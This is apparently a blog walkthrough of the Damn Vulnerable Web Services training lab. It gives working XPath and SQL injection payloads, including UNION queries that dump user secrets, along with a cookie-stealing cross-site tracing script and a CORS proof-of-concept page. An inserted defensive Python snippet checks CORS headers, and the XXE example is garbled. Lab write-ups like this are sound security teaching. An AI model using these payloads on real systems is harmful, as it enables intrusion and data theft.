Walkthrough of Damn Vulnerable Web Services (DVWS)

Installation

Damn Vulnerable Web Services (DVWS) is a vulnerable web application that has various insecure web service elements. It provides a platform for learning about real-world web service vulnerabilities.

https://github.com/snoopysecurity/dvws

WSDL Enumeration

You can find the vulnerable component, service.php, by spidering DVWS using Burp Suite.

The SOAP service processes requests including _check_user_information_, _owasp_apitop10_, _population_ and _return_price_.

XPATH Injection

User Login:

```
1' or '1'='1
```

User Password:

```
1' or '1'='1
```

Command Injection

Original Request

Initially, the parameter value of _name_ is set to “find”.

Edited Request

By changing the parameter value of _name_ from “find” to “dir”, we can observe a different response.

Cross Site Tracing (XST)

DVWS indicates the vulnerability with the message “The NuSOAP Library service is vulnerable to a Cross-site scripting flaw.” Exploit-DB provides a published exploit for it (https://www.exploit-db.com/exploits/34565/).

Note: We modified the source code at \dvws\vulnerabilities\xst\xst.php because of an issue with cookie creation. The following code snippet was moved to the beginning of xst.php:

As noted by DVWS, the vulnerable page is /dvws/vulnerabilities/wsdlenum/service.php/

The following payload was used to carry out the XST attack:

```javascript
// Synchronous request to the XST page; the response body (which echoes the
// request, cookies included, when TRACE/TRACK is enabled) is shown in an alert.
var req = new XMLHttpRequest();
req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php', false);
req.send();
result = req.responseText;
alert(result);
```

URL:

```
http://localhost/dvws/vulnerabilities/wsdlenum/service.php/var req = new XMLHttpRequest();req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);req.send();result=req.responseText;alert(result);
```

Changing the GET method to a TRACK method yields the following:

This results in cookie information disclosure.

The article “Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)” provides a more in-depth look at XST.

REST API SQL Injection

```
2 or 1=1
```

Extract Information

```
2 UNION SELECT 1,2
2 UNION SELECT database(),@@datadir
```

Extract Table Name

```
2 union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvws'--
```

Extract Column Name

```
2 union select group_concat(column_name),database() from information_schema.columns where table_schema='dvws' and table_name='users'--
```

Dump Data From Extracted Table and Column Names

```
2 union select id, secret from users--
```

For a deeper dive into SQL Injection, refer to the article “_Penetration Testing with OWASP Top 10 - 2017 A1 Injection_.”

XML External Entity 2

```xml
]>

&systemEntity;
```

Request

Response

JSON Web Token (JWT) Secret Key Brute Force

The correct secret key, 1234567890, has been successfully identified.

Same Origin Method Execution (SOME)

Cross-Origin Resource Sharing (CORS)

Checking for Arbitrary Origin Trust

Request

The Origin request header is modified to “http://xyz.com”.

Response

The response shows that the application permits access from all domains (including the arbitrary origin http://xyz.com).

The presence of the Access-Control-Allow-Credentials: true response header indicates that unauthorized third-party websites might be able to execute privileged operations and access sensitive data.
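As an added example that is not part of the walkthrough or of DVWS itself, the following Python rates a response to the arbitrary-Origin probe described above (reflected origin plus `Access-Control-Allow-Credentials: true` is the dangerous combination) and shows the exact-match allowlist a server should use instead of echoing whatever Origin it receives. The sample headers are constructed to match what the walkthrough reports.

```python
# Added example (not part of the DVWS walkthrough or the DVWS project code):
# classify the CORS response to an arbitrary-Origin probe, and show the
# allowlist logic a server should use instead of reflecting the Origin header.

PROBE_ORIGIN = "http://xyz.com"  # the arbitrary origin used in the walkthrough

# Constructed sample: the header pair the walkthrough reports DVWS returning.
VULNERABLE_RESPONSE = {
    "Access-Control-Allow-Origin": "http://xyz.com",
    "Access-Control-Allow-Credentials": "true",
}


def classify_cors(response_headers, probe_origin=PROBE_ORIGIN):
    """Rate how dangerous a CORS response is for the given probe origin."""
    # Header names are case-insensitive; normalise before looking them up.
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    credentials = h.get("access-control-allow-credentials", "").lower() == "true"
    reflected = acao == probe_origin
    wildcard = acao == "*"
    if reflected and credentials:
        # The browser attaches the victim's cookies to the cross-origin request
        # and lets the foreign page read the authenticated response.
        severity = "high"
    elif reflected or wildcard:
        # Readable cross-origin, but only unauthenticated content
        # (browsers refuse '*' combined with credentials).
        severity = "medium"
    else:
        severity = "none"
    return {"reflected": reflected, "wildcard": wildcard,
            "credentials": credentials, "severity": severity}


def cors_headers_for(request_origin, allowlist):
    """Server-side fix: echo the Origin only when it exactly matches an
    allowlisted origin, and add Vary: Origin so caches keep responses apart."""
    if request_origin not in allowlist:
        return {}  # no CORS headers at all: the browser blocks the read
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


if __name__ == "__main__":
    print(classify_cors(VULNERABLE_RESPONSE))
    print(cors_headers_for("http://xyz.com", ["https://192.168.24.2"]))
```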

Content of cors_poc.html

```javascript
// Proof of concept: from a page on a foreign origin, POST to the DVWS CORS
// endpoint and write the cross-origin response into the page once it arrives.
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    document.getElementById("secret").innerHTML = this.responseText;
  }
};
xhttp.open("POST", "https://192.168.24.2/dvws/vulnerabilities/cors/server.php", true);
xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhttp.send(JSON.stringify({"searchterm":"secretword:one"}));
```

Request

Response


Licensed under CC BY-NC-SA 4.0
Last updated on Jul 15, 2024 03:26 +0100